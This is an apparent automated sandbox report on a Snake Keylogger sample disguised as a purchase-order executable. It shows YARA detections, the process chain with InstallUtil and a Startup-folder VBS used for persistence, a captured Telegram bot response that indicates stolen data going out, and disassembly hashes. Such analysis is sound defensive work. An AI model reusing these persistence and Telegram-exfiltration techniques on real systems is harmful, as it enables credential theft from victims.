2024-11-05 10:05:31 UTC	520	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 34 37 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 38 34 33 31 36 30 39 36 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 79 31 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6d 61 79 31 6f 64 6e 64 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 35 33 30 32 33 36 31 30 34 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 50 72 61 68 6b 61 73 68 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 42 72 68 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 74 72 78 66 76 79 77 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 30 38 30 31 31 33 31 2c 22 64 6f 63 75 6d 65 6e Data Ascii: {"ok":true,"result":{"message_id":8471,"from":{"id":6843160964,"is_bot":true,"first_name":"May1","username":"may1odndbot"},"chat":{"id":5302361040,"first_name":"Prahkash","last_name":"Brha","username":"trxfvyw","type":"private"},"date":1730801131,"documen

Analysis Process: PO_63738373663838____________________________________________________________________________.exePID: 7248, Parent PID: 4056

General

Target ID:	0
Start time:	05:04:42
Start date:	05/11/2024
Path:	C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe"
Imagebase:	0xaf0000
File size:	393'216 bytes
MD5 hash:	D3E321AE2428648BD5A282D473FB4118
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1315973231.0000000006C50000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1296947151.0000000002EF7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1296947151.00000000032C3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000002.1296947151.00000000032C3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.1296947151.00000000032C3000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1308353668.00000000040F4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000002.1308353668.00000000040F4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1308353668.00000000040F4000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.1308353668.00000000040F4000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1308353668.0000000003ED1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000002.1308353668.0000000003ED1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1308353668.0000000003ED1000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.1308353668.0000000003ED1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	05:04:48
Start date:	05/11/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Imagebase:	0xdf0000
File size:	42'064 bytes
MD5 hash:	5D4073B2EB6D217C19F2B22F21BF8D57
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000007.00000002.3709580619.00000000032FB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000007.00000002.3709580619.0000000003269000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000007.00000002.3709580619.0000000003362000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000007.00000002.3709580619.0000000003362000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000007.00000002.3709580619.00000000030A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	10
Start time:	05:05:00
Start date:	05/11/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Keywords.vbs"
Imagebase:	0x7ff7d5070000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	05:05:01
Start date:	05/11/2024
Path:	C:\Users\user\AppData\Roaming\Keywords.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Keywords.exe"
Imagebase:	0xea0000
File size:	393'216 bytes
MD5 hash:	D3E321AE2428648BD5A282D473FB4118
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000000B.00000002.1494831199.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.1494831199.0000000003786000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000B.00000002.1494831199.0000000003786000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 0000000B.00000002.1494831199.0000000003786000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.1516774520.0000000004572000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000B.00000002.1516774520.0000000004572000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000B.00000002.1516774520.0000000004572000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 0000000B.00000002.1516774520.0000000004572000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000000B.00000002.1516774520.00000000046DA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 39%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	06:52:51
Start date:	05/11/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Imagebase:	0x4f0000
File size:	42'064 bytes
MD5 hash:	5D4073B2EB6D217C19F2B22F21BF8D57
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000C.00000002.3709879973.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.3705012521.0000000000415000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000C.00000002.3705012521.0000000000415000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000C.00000002.3705012521.0000000000415000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 0000000C.00000002.3705012521.0000000000415000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000C.00000002.3709879973.0000000002AF1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000C.00000002.3709879973.0000000002B58000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000C.00000002.3709879973.0000000002B58000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000C.00000002.3709879973.0000000002891000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: PO_63738373663838____________________________________________________________________________.exePID: 7248, Parent PID: 4056COMMON

Executed Functions

Function 0148E0D0 Relevance: 8.5, Strings: 6, Instructions: 983COMMON

Download Yara Rule

Strings

TJq, xrefs: 0148E272
Teq, xrefs: 0148E7F3
pq, xrefs: 0148EC8A
MF, xrefs: 0148E490
xbq, xrefs: 0148E1FD
KO\, xrefs: 0148E4B7

Memory Dump Source

Source File: 00000000.00000002.1296624000.0000000001480000.00000040.00000800.00020000.00000000.sdmp, Offset: 01480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1480000_PO_63738373663838_____________________________________________________.jbxd

Similarity

API ID:
String ID: KO\$MF$TJq$Teq$pq$xbq
API String ID: 0-3744007259
Opcode ID: a03c954ce933c24f5722798eef3c73b363e0731f81f37d9142c5ba6467ae7209
Instruction ID: bf9b80fd6cadbc2e1473ea29ac72814b3169f8e7100f776ae92e956fbbf8e973
Opcode Fuzzy Hash: a03c954ce933c24f5722798eef3c73b363e0731f81f37d9142c5ba6467ae7209
Instruction Fuzzy Hash: 2CA2C475A00228CFDB64DF69C980A9DBBB2FF89304F1581E9D509AB365DB319E81CF40

Function 075DEC40 Relevance: 1.5, Strings: 1, Instructions: 276COMMON

Download Yara Rule

Strings

Dq, xrefs: 075DED45

Memory Dump Source

Source File: 00000000.00000002.1316638603.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_75c0000_PO_63738373663838_____________________________________________________.jbxd

Similarity

API ID:
String ID: Dq
API String ID: 0-144822681
Opcode ID: 989cba8f15c8e152e82b02ef74ecfd4515e5621b8b9f8aaa64fe2d8c25c8669e
Instruction ID: f8d3352f31a39f89b8dcedefdccf5d47ad3bc00b44028a6ad854aaffd912ad25
Opcode Fuzzy Hash: 989cba8f15c8e152e82b02ef74ecfd4515e5621b8b9f8aaa64fe2d8c25c8669e
Instruction Fuzzy Hash: E2D1B674E01218CFDB54DFA9D894B9DBBB2BF89300F5081A9D409AB365DB31AD81CF50

Function 01481765 Relevance: .3, Instructions: 315COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1296624000.0000000001480000.00000040.00000800.00020000.00000000.sdmp, Offset: 01480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1480000_PO_63738373663838_____________________________________________________.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9dc802d54c2ff6f3ba165930f42f5210dbc0a7873614762230442475b5bf1ab5
Instruction ID: 198e6f3639649453506c2117d7b265998e420b7acc099fcd1ad1b11dd6474636
Opcode Fuzzy Hash: 9dc802d54c2ff6f3ba165930f42f5210dbc0a7873614762230442475b5bf1ab5
Instruction Fuzzy Hash: A3D11A74A00214CFD718EF59D448BADB7F2BB88B11F18856BE1069B3B9D775AC86CB40

Function 0148F9C8 Relevance: 6.6, Strings: 5, Instructions: 366COMMON

Download Yara Rule

Strings

(q, xrefs: 0148FB33
(q, xrefs: 0148FD11
(q, xrefs: 0148FBEA
(q, xrefs: 0148FC16
(q, xrefs: 0148FADC

Memory Dump Source

Source File: 00000000.00000002.1296624000.0000000001480000.00000040.00000800.00020000.00000000.sdmp, Offset: 01480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1480000_PO_63738373663838_____________________________________________________.jbxd

Similarity

API ID:
String ID: (q$(q$(q$(q$(q
API String ID: 0-3203009404
Opcode ID: a8c97a2d08c2866e86ec01ed78ad37923c57eed6bbe615284c85dc883f327fd2
Instruction ID: 61e1bf35324f81fd5ad0ad433b44afcf5538edb5e42dd548375698810aaffd20
Opcode Fuzzy Hash: a8c97a2d08c2866e86ec01ed78ad37923c57eed6bbe615284c85dc883f327fd2
Instruction Fuzzy Hash: 7CC125317042119FDB15EF69E810AAF7BA6FFC4210B14856AE905CB3A1CB38DC46C7A1

Function 075C83A6 Relevance: 1.3, Strings: 1, Instructions: 25COMMON

Download Yara Rule

Strings

T, xrefs: 075C83DF

Memory Dump Source

Source File: 00000000.00000002.1316638603.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_75c0000_PO_63738373663838_____________________________________________________.jbxd

Similarity

API ID:
String ID: T
API String ID: 0-3187964512
Opcode ID: 303153bd929ea4e81250fed8574a417fecba2a16bbedee1a4cbb186b2adb18a1
Instruction ID: 434fb56fc5be74472cb27cd7e220a52daad701426dd811fdeea0310c0c8cefc7
Opcode Fuzzy Hash: 303153bd929ea4e81250fed8574a417fecba2a16bbedee1a4cbb186b2adb18a1
Instruction Fuzzy Hash: BD01B2B090022ACFCBB4DF54CC887EAB7B1BB45305F1080EAC05CA6680EB755AC8CF81

Function 075DD5C8 Relevance: .1, Instructions: 110COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316638603.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_75c0000_PO_63738373663838_____________________________________________________.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ee49f63015506e7df16685228afc18146685bb94dc513b8b205faa59b7e7053
Instruction ID: 10445a2b1693f44c452a0acf3b3e0184e43eacd8567211691da560b171e6c394
Opcode Fuzzy Hash: 8ee49f63015506e7df16685228afc18146685bb94dc513b8b205faa59b7e7053
Instruction Fuzzy Hash: 0741E1B0E0521A9BDF20DFE9D4486EEBBF1FB49311F10886AD009B7250D7785E84CBA1

Function 0148A070 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1296624000.0000000001480000.00000040.00000800.00020000.00000000.sdmp, Offset: 01480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1480000_PO_63738373663838_____________________________________________________.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc3b4a77976b21a1e7d5fa74cae242847ce77c3604685bd21a1e98c7938b269c
Instruction ID: d70c58272d8566b750742bfd57f427278a4b71ad4c2427584f2cf3a71ad9ed2a
Opcode Fuzzy Hash: bc3b4a77976b21a1e7d5fa74cae242847ce77c3604685bd21a1e98c7938b269c
Instruction Fuzzy Hash: 95417CB080A348DFD701EFA9C4543AEBFF1BF4A305F5481ABD045A7262D7780A4ACB52

Function 014824DF Relevance: .1, Instructions: 85COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1296624000.0000000001480000.00000040.00000800.00020000.00000000.sdmp, Offset: 01480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1480000_PO_63738373663838_____________________________________________________.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 65d83df8ec012e1654ea53e7f76d7872edfd9a1b80ae944cc739b2b8c86230f2
Instruction ID: 70a7f9d130b63f78568b5c354d30aa892d3eab94eeb1c450bf5beba5fc81cb28
Opcode Fuzzy Hash: 65d83df8ec012e1654ea53e7f76d7872edfd9a1b80ae944cc739b2b8c86230f2
Instruction Fuzzy Hash: 65311A70D012489FDB24DFA9C590ADEBFF5BF48310F14841AE919AB350DB749941CFA0

Function 014824E8 Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1296624000.0000000001480000.00000040.00000800.00020000.00000000.sdmp, Offset: 01480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1480000_PO_63738373663838_____________________________________________________.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b654d6bbe2653bdf0af65806ec1659f91afd172f05f4221d81d5bb8b22eab864
Instruction ID: 6afa30d80d0803e1a46ed4961925924fea02359b05b1fb4678584d618a634fed
Opcode Fuzzy Hash: b654d6bbe2653bdf0af65806ec1659f91afd172f05f4221d81d5bb8b22eab864
Instruction Fuzzy Hash: ED310770D012489FDB24DFA9C590ADEBFF5BF48310F24842AE919AB350DB749941CFA0

Function 0143D006 Relevance: .1, Instructions: 80COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1296352689.000000000143D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0143D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_143d000_PO_63738373663838_____________________________________________________.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 036a60c262f419e7399ce9713aad4ea335e5653432557c26c16dc1fe3273bad3
Instruction ID: 7ec8a85e4a524fcfaf57648d7d245609f1527780e43e927211cca8181de58422
Opcode Fuzzy Hash: 036a60c262f419e7399ce9713aad4ea335e5653432557c26c16dc1fe3273bad3
Instruction Fuzzy Hash: 41316F7550D3C48FCB13CF64D990716BF71AB86214F1981DBD9858F2A7C339981ACBA2

Function 0148DF20 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1296624000.0000000001480000.00000040.00000800.00020000.00000000.sdmp, Offset: 01480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1480000_PO_63738373663838_____________________________________________________.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c523519340b227cfc243aa3ec8ce59dbd17a02d96c565e3a8cc4c859473c700f
Instruction ID: 487be848f1bc74c5109d2c0b3511ae7eecb032251fd95122695fc30ed6084e87
Opcode Fuzzy Hash: c523519340b227cfc243aa3ec8ce59dbd17a02d96c565e3a8cc4c859473c700f
Instruction Fuzzy Hash: 43213774E05219CBDB04EFAAD8542EEBBF2BB8D300F10852AD615A33A4DB7859419F91

Function 0148A0A8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1296624000.0000000001480000.00000040.00000800.00020000.00000000.sdmp, Offset: 01480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1480000_PO_63738373663838_____________________________________________________.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a47be5a5461b4a56dd5620808fce71c57a864cb9743a21085ef20b2d06d12693
Instruction ID: 240601f8a2b3555d55cb8d559968c37ff809b6de5b91f9318009864513a25fd6
Opcode Fuzzy Hash: a47be5a5461b4a56dd5620808fce71c57a864cb9743a21085ef20b2d06d12693
Instruction Fuzzy Hash: E23129B0D05208DFD704EFA9C0487ADBBF1FB8A305F60D1ABD505A3361D7B85A868B41

Function 0143D030 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1296352689.000000000143D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0143D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_143d000_PO_63738373663838_____________________________________________________.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8cd945af552febc98e43cfb5abe65409904ac7ac20f5cda7936a9f2866d781c1
Instruction ID: c229da3e50861d94d8fdd5a40edf0d9b0095e5d5d8a20de08daedbad805c1d79
Opcode Fuzzy Hash: 8cd945af552febc98e43cfb5abe65409904ac7ac20f5cda7936a9f2866d781c1
Instruction Fuzzy Hash: 0C21F1B19042009FDB15DF54D984B17BB75EBC8718F60816AE8090A256C336D81BCAA2

Function 0148F2B8 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1296624000.0000000001480000.00000040.00000800.00020000.00000000.sdmp, Offset: 01480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1480000_PO_63738373663838_____________________________________________________.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 340d221cd872d8adc3f543ae38e815c3af8c080d9b2bfeb926db12296394ea18
Instruction ID: 1724b5fbd9a46e64128ff09a53ea5ad7d1ee30754d3329d16f99fdd2fad76b28
Opcode Fuzzy Hash: 340d221cd872d8adc3f543ae38e815c3af8c080d9b2bfeb926db12296394ea18
Instruction Fuzzy Hash: B6113474D04209DFDB04EF9AD8446EEBBBAFB89310F10802AD905F3260D7755A89CB94

Function 075DA2C8 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316638603.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_75c0000_PO_63738373663838_____________________________________________________.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c7caf1df86f2c63c921b5a2066bbf6f43354dec85694cca97367d190b8f141a
Instruction ID: 2f3fafe14694e4017df6f527dc2ed31fbbd57d162ca380a6f430f1502959ea16
Opcode Fuzzy Hash: 2c7caf1df86f2c63c921b5a2066bbf6f43354dec85694cca97367d190b8f141a
Instruction Fuzzy Hash: 1E21CFB4A042098FCB04DFA9C544AEEBBF1FB48310F10842AD505B3350DB35AD40CFA1

Function 075C5213 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316638603.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_75c0000_PO_63738373663838_____________________________________________________.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b089a3d6424f3ed2b4e96c8f7463a9f9225e91805f4d9ff4c5bec2ac1165db4
Instruction ID: e4794271f87891ba83d16c70cb7b6072909bd9f2848faed5625daf39fac59189
Opcode Fuzzy Hash: 6b089a3d6424f3ed2b4e96c8f7463a9f9225e91805f4d9ff4c5bec2ac1165db4
Instruction Fuzzy Hash: 3221D5B8A4422ACFDB68DF18C994AD9B7F1FB89300F5042E9D50CA7755CB349E818F44

Function 0142D76D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1296277317.000000000142D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0142D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_142d000_PO_63738373663838_____________________________________________________.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b62cda703e1f6b0afd39038755a05bc6d7e2462faf637dee413d1310bbabd569
Instruction ID: 8797bfef7e26560ed2ffe87abf88eb047afb6eedc09dd1af0734a4c9e9afe512
Opcode Fuzzy Hash: b62cda703e1f6b0afd39038755a05bc6d7e2462faf637dee413d1310bbabd569
Instruction Fuzzy Hash: 5801F2318083A49EE7204A65DC84B67BF98DF81625F48C02BED094A296C37C9885CAB2

Function 0142D76C Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1296277317.000000000142D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0142D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_142d000_PO_63738373663838_____________________________________________________.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c4615dfd8d58c10564e29e3c80548c07306958004b9f7af0f34f614c6cf64e3
Instruction ID: 0e4c2284029ad9974720cc55d29a056653a49e49f599b6d84204368680ce83e1
Opcode Fuzzy Hash: 9c4615dfd8d58c10564e29e3c80548c07306958004b9f7af0f34f614c6cf64e3
Instruction Fuzzy Hash: 41F0C231404394AEE7108A19D884B63FF98EB81634F18C05BED084A296C3789844CBB1

Function 075C8F78 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316638603.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_75c0000_PO_63738373663838_____________________________________________________.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 293653306648eba3fd81ec264f14cfb9b516b9a05c355ba2e7585c2597d58090
Instruction ID: 52316d7f876110fe1238b87c28dead2b0f5f7b1bb911c91a70f775be4dacc536
Opcode Fuzzy Hash: 293653306648eba3fd81ec264f14cfb9b516b9a05c355ba2e7585c2597d58090
Instruction Fuzzy Hash: C0012C70A00225CFC755DF58CC88A9AB3B2FB49304FA080DAD509A7254CB756E82CF11

Function 0148086B Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1296624000.0000000001480000.00000040.00000800.00020000.00000000.sdmp, Offset: 01480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1480000_PO_63738373663838_____________________________________________________.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 51fcc28ea224254da377b3d5c011986c3645fb3195b4696dc1b74cd50781b924
Instruction ID: 99a3fca7ae4ccf7ac14da1a47c0d23c811fc8746c7f177a7fe13f4636cf14c4c
Opcode Fuzzy Hash: 51fcc28ea224254da377b3d5c011986c3645fb3195b4696dc1b74cd50781b924
Instruction Fuzzy Hash: 16E0172509D7C04FD71317B029780B83F749E6B22430E45E7E8D98B073D62A486BC362

Function 0148F0A8 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1296624000.0000000001480000.00000040.00000800.00020000.00000000.sdmp, Offset: 01480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1480000_PO_63738373663838_____________________________________________________.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f464f51bccd30570d4dc4cd8904a2886e627746f6dd7ad58ff3f8809123fd3a
Instruction ID: 44a76f1090f330da411e5e515523f798b8b8d4abdc169eae604c5e113c21e86f
Opcode Fuzzy Hash: 9f464f51bccd30570d4dc4cd8904a2886e627746f6dd7ad58ff3f8809123fd3a
Instruction Fuzzy Hash: 4FF0A574D05208EFCB94EFA8D940A9DFBB5EB49300F10C1AAA81993351E6359A56DF40

Function 075DA5E8 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316638603.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_75c0000_PO_63738373663838_____________________________________________________.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 114cbf8780085643c588dd8d98e5c0b7be62808c39b5247f044524e7eac8bbe5
Instruction ID: ba22f5ee69a163bcf1dbb8af43e7dbe9aa473758e3a352a3b2c3a7638adf13d1
Opcode Fuzzy Hash: 114cbf8780085643c588dd8d98e5c0b7be62808c39b5247f044524e7eac8bbe5
Instruction Fuzzy Hash: 32E0C9B4D04208EFCB54DFA8D54069DFBF4FB59300F10C5AA980993351D6359E91DF44

Function 075D5CE0 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316638603.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false

